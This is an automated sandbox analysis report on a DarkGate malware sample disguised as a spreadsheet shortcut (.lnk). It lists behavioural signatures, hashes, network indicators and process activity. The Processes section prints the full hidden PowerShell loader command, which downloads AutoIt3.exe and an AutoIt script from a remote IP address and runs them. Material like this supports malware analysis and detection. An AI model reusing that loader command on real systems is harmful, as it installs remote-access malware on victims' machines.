Analysis Overview
SHA256
06cc011f34188a2156c18c1307fd625ac9a2ed916a4c7e01b40513a826bd24d0
Threat Level: Known bad
The file All-Ftds-Report.xlsx.lnk was found to be: Known bad.
Malicious Activity Summary
DarkGate
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Enumerates physical storage devices
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 23:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 23:22
Reported
2023-10-26 23:32
Platform
win10-20231025-en
Max time kernel
315s
Max time network
389s
Command Line
Signatures
DarkGate
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\AutoIt3.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Public\AutoIt3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Public\AutoIt3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 4900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2988 wrote to memory of 4900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4900 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Public\AutoIt3.exe |
| PID 4900 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Public\AutoIt3.exe |
| PID 4900 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Public\AutoIt3.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\All-Ftds-Report.xlsx.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "&{ Invoke-WebRequest -Uri "http:/\194.26.192.233/AutoIt3.exe" -OutFile "C:\Users\Public\AutoIt3.exe"; Invoke-WebRequest -Uri "http:/\194.26.192.233/bone.au3" -OutFile "C:\Users\Public\bone.au3"; Invoke-WebRequest -Uri "http://194.26.192.233/document.xlsx" -OutFile "C:\Users\Public\Documents\document.xlsx"; "C:\Users\Public\AutoIt3.exe C:\Users\Public\bone.au3"; C:\Users\Public\Documents\document.xlsx }"
C:\Users\Public\AutoIt3.exe
"C:\Users\Public\AutoIt3.exe" C:\Users\Public\bone.au3
Network
| Country | Destination | Domain | Proto |
| NL | 194.26.192.233:80 | 194.26.192.233 | tcp |
| US | 8.8.8.8:53 | 233.192.26.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.178.238.8.in-addr.arpa | udp |
Files
memory/4900-6-0x000001FA7EF90000-0x000001FA7EFB2000-memory.dmp
memory/4900-7-0x00007FFC241D0000-0x00007FFC24BBC000-memory.dmp
memory/4900-8-0x000001FA7EFF0000-0x000001FA7F000000-memory.dmp
memory/4900-9-0x000001FA7EFF0000-0x000001FA7F000000-memory.dmp
memory/4900-12-0x000001FA7F380000-0x000001FA7F3F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yohd21gr.fki.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4900-27-0x000001FA7EFF0000-0x000001FA7F000000-memory.dmp
memory/4900-41-0x000001FA18000000-0x000001FA187A6000-memory.dmp
memory/4900-51-0x000001FA7EFF0000-0x000001FA7F000000-memory.dmp
C:\Users\Public\AutoIt3.exe
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\Users\Public\bone.au3
| MD5 | df26679034f7cb5a69fd065e54dc5fc0 |
| SHA1 | 4a7a998ac1f903378f446d902f1be05c23772965 |
| SHA256 | 7f0624141092f91ca74a6bf5c51408b445224ed6e504329acb04fee609a897cd |
| SHA512 | 81f41adf9bd72fe51ae8c3f4914c30d4533594afb1f11438d389319fa94a9fac691cd718c2cb1ab75cc2d877805a8c899af6d0dd5ad1b2634c2fd7fc5ad326eb |
memory/1824-68-0x0000000004160000-0x000000000448A000-memory.dmp
memory/4900-69-0x00007FFC241D0000-0x00007FFC24BBC000-memory.dmp
memory/1824-67-0x00000000010D0000-0x00000000014D0000-memory.dmp